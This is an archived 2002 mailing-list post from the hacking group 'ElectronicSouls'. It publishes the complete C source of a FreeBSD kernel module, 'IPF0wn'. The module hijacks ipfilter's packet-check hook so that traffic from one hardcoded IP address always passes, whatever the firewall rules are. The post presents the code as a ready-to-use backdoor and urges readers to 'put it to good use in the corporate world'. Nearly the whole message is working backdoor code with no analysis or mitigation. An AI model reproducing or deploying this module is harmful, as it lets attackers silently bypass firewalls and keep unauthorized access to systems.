| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <200211292130.gATLUbfT089645@mailserver3.hushmail.com>
From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] - ipf backdoor
-----BEGIN PGP SIGNED MESSAGE-----
Dear List,
Here is a backdoor you may find useful on your penetration tests; it
forces ip filter to receive packets from a specified IP, no matter what
the actual ipf rules are.
Put it to good use in the corporate world.
# cat ES-ipf0wn.c
/*
* ----------------------------- !DO NOT DISTRIBUTE! -----------------------------
* !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !!
* ----------------------------- !DO NOT DISTRIBUTE! -----------------------------
*
* IPF0wn (C) KernelPanic & BrainStorm [ElectronicSouls]
* Tested on: FreeBSD 3.4
*
* Idea- BrainStorm / KernelPanic
* Code- KernelPanic / BrainStorm
*
* this will get ipfilter to always accept packets from a special IP
*
* Brain's 1st LKM ! so b0w d0wn =)
*
* "BrainPanic, thats when kernelpanic and brainstorm get together and code ;)"
* Greetz:
* ElectronicSouls,ADM,anti.security.is,TESO,0x7f
*
* ----------------------------- !DO NOT DISTRIBUTE! -----------------------------
* !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !!
* ----------------------------- !DO NOT DISTRIBUTE! -----------------------------
*/
#define OWNED "127.0.0.1" /* guess what ?? */
#include <sys/param.h>
#include <sys/systm.h>
#include <sys/malloc.h>
#include <sys/mbuf.h>
#include <sys/kernel.h>
#include <sys/proc.h>
#include <sys/socket.h>
#include <sys/socketvar.h>
#include <net/if.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_var.h>
typedef struct ip ip_t;
typedef struct mbuf mb_t;
typedef int ipfr_t __P((ip_t *, int, void *, int, mb_t **));
static int s_load __P((struct module *, int, void *));
static u_int32_t inaton __P((const char *));
extern ipfr_t *fr_checkp;
static ipfr_t myfr, *fr;
static int
s_load (struct module *module, int cmd, void *arg)
{
int s;
switch(cmd)
{
case MOD_LOAD:
s = splnet();
fr = fr_checkp;
fr_checkp = myfr;
splx(s);
break;
case MOD_UNLOAD:
s = splnet();
fr_checkp = fr;
splx(s);
break;
}
return 0;
}
static moduledata_t s_mod_1 = {
"ipfil_mod",
s_load,
0
};
DECLARE_MODULE(ipfil_mod, s_mod_1, SI_SUB_PSEUDO, SI_ORDER_ANY);
static int
myfr(ip_t *ip, int hlen, void *ifp, int out, mb_t **mp)
{
if(ip->ip_src.s_addr == inaton(OWNED))
return 0;
return(fr(ip, hlen, ifp, out, mp));
}
static u_int32_t
inaton(const char *str)
{
unsigned long l;
unsigned int val;
int i;
l = 0;
for(i=0; i < 4; i++)
{
l <<= 8;
if(*str != '\0') {
val = 0;
while(*str != '\0' && *str != '.') {
val *= 10;
val += *str - '0';
str++;
}
l |= val;
if(*str != '\0')
str++;
}
}
return(htonl(l));
}
/* ps: Brain- check the handler ..*/
/* and dont give it anyone outside ES yet ;) im sure you dont anyway ..later bro */
#
The Electronic Souls Crew
[ElectronicSouls] (c) 2002
"Save the planet."
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify
wlMEARECABMFAj3n3JAMHGVzQGh1c2guY29tAAoJEN5nGqhGcjlt5z0AnjvWtmx/V56T
aOTVxtLNuXtdqsMvAJ9e7on7bCgiF13/4ob7sfRznOWQeg==
=rUff
-----END PGP SIGNATURE-----
Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2
Big $$$ to be made with the HushMail Affiliate Program:
https://www.hushmail.com/about.php?subloc=affiliate&l=427
Powered by blists - more mailing lists